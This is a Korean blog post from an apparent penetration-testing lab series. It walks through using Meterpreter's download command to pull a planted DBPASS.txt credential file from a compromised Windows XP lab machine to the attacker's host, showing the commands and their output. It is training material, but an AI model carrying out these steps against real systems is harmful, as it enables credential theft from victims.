실습> 파일 다운로드
meterpreter > help download
Usage: download [options] src1 src2 src3 ... destination
Downloads remote files and directories to the local machine.
OPTIONS:
-a Enable adaptive download buffer size
-b <opt> Set the initial block size for the download
-c Resume getting a partially-downloaded file
-h Help banner
-l <opt> Set the limit of retries (0 unlimits)
-r Download recursively
-t Timestamp downloaded files
1. 파일 생성
Windows XP 에서 DBPASS.txt 파일을 생성한다.
-- DBPASS.txt --
root 암호 : P@ssw0rd
-- DBPASS.txt --
2. 파일 목록 확인
meterpreter > pwd
C:\Documents and Settings\ksw
meterpreter > cd "바탕 화면"
meterpreter > ls
Listing: C:\Documents and Settings\ksw\바탕 화면
============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 20 fil 2022-01-05 03:00:47 -0500 DBPASS.txt
100777/rwxrwxrwx 1670656 fil 2022-01-04 05:10:04 -0500 HxD.exe
100666/rw-rw-rw- 809 fil 2022-01-04 05:43:07 -0500 HxD.ini
40777/rwxrwxrwx 0 dir 2016-03-28 06:11:36 -0400 SysinternalsSuite
100666/rw-rw-rw- 1477 fil 2016-03-28 06:04:36 -0400 Wireshark.lnk
100666/rw-rw-rw- 2423 fil 2016-03-28 06:00:19 -0400 adrenalin.m3u
100666/rw-rw-rw- 2409 fil 2016-03-28 06:06:56 -0400 adrenalin2.m3u
100666/rw-rw-rw- 2405 fil 2016-03-28 06:06:56 -0400 adrenalin2.m3u.bak
100666/rw-rw-rw- 123197 fil 2016-03-28 06:19:51 -0400 calc_download.pcap
100777/rwxrwxrwx 73802 fil 2022-01-04 06:46:37 -0500 malware.exe
100777/rwxrwxrwx 59392 fil 2022-01-03 05:20:01 -0500 nc.exe
100777/rwxrwxrwx 1543680 fil 2022-01-03 07:12:20 -0500 putty2.exe
100666/rw-rw-rw- 1535 fil 2016-03-28 05:50:41 -0400 아드레날린.lnk
3. 파일 다운로드
meterpreter > download DBPASS.txt
[*] Downloading: DBPASS.txt -> /root/DBPASS.txt
[*] Downloaded 20.00 B of 20.00 B (100.0%): DBPASS.txt -> /root/DBPASS.txt
[*] download : DBPASS.txt -> /root/DBPASS.txt
다른 터미널을 열어서 DBPASS.txt 파일을 확인한다.
Attacker ~# cat DBPASS.txt
root 암호 : P@ssw0rd
'Linux > 모의해킹' 카테고리의 다른 글
레지스트리 명령어 추가 (0) | 2022.01.05 |
---|---|
키 로그 (Key Log) (0) | 2022.01.05 |
meterpreter 명령어 사용하기 (0) | 2022.01.05 |
쉘스크립트를 활용한 공격 1 & 2 (0) | 2022.01.04 |
Download_exec Payload (0) | 2022.01.04 |